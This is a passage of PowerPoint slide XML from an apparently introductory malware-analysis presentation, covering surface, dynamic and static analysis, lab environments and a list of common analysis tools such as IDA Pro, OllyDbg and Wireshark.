        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379902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 Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="1124744"/>
            <a:ext cx="9036496" cy="5733256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Existence &amp; Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Types of Malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Goals of Malware Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Malware Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Surface </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Malware Analysis Tools &amp; Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual Machines (VMWare, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Obfuscation techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassemblers and Debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packer Detector &amp; Unpackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Project </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>IDA Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18993550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 y="3310711"/>
            <a:ext cx="3345928" cy="3318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a:t>Malware Analysis</a:t>
            </a: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268760"/>
            <a:ext cx="6402932" cy="2017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737022" y="3429000"/>
            <a:ext cx="4031168" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>No threats found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sample found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>New threats found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Complex obfuscation techniques used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lack of time, resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>File sample is not prioritised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516216" y="2261445"/>
            <a:ext cx="1584176" cy="1400061"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 10116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0" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099953" y="2984780"/>
            <a:ext cx="439" cy="3259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2771800" y="1484784"/>
            <a:ext cx="3600400" cy="360040"/>
          </a:xfrm>
          <a:prstGeom prst="arc">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Arc 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627784" y="1484784"/>
            <a:ext cx="3888432" cy="36004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3281049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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Analysis (Scanning)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: recognizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>or discovering a malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>signature (i.e. opening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>sample and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>quickly search for information in the sample file without executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>it).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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42" y="3284984"/>
            <a:ext cx="8020614" cy="2196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26539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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Dynamic Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of running the target sample and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>gathering diagnostics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and behaviour results based on logs and monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>tools.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564904"/>
            <a:ext cx="5832574" cy="4251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38540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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Behaviours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Mainly processes run, with threads. Shows what processes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>are spawned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and with which commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>File and registry accesses and alterations. Shows file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>registry read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, write, creations and deletes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All network traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Required: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Controlled environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring tools (Wireshark, Process Monitor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FileDump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718298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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: examination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>machine code of the binary sample in order to further discover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>functionality and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>techniques used by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>sample.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The sample is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>not executed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>monitor behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, it is the machine code in the binary file that is examined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>it may be very time consuming and it may be very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>complex to perform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>But static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>analysis is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…. safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassemblers or Debuggers (IDA Pro / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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248" y="5661248"/>
            <a:ext cx="7802328" cy="862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01247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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Tips</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Briefly study a malware before go deeply into it  since most of malwares are complex and huge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There is no common approach for analysing of all malwares. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different tools &amp; techniques provide different analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different scenarios provides generate different analysis results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Should do analysis by different ways and tools/techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools/techniques vs. malwares evolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="944937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Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Real: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>BootROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Ghost, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>VMWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Windows, Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Net Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Java Runtime Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Aspack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Udx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Firefox, PDF reader, Office,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39203085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a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro: disassembler/debugger </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: disassembler/debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: file header analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Resource Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: File packer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>detector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Dependency Walker: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL explorer </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark: network protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>analyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Regshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Burp: proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ArpateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CheatEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>process memory </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42303233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a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
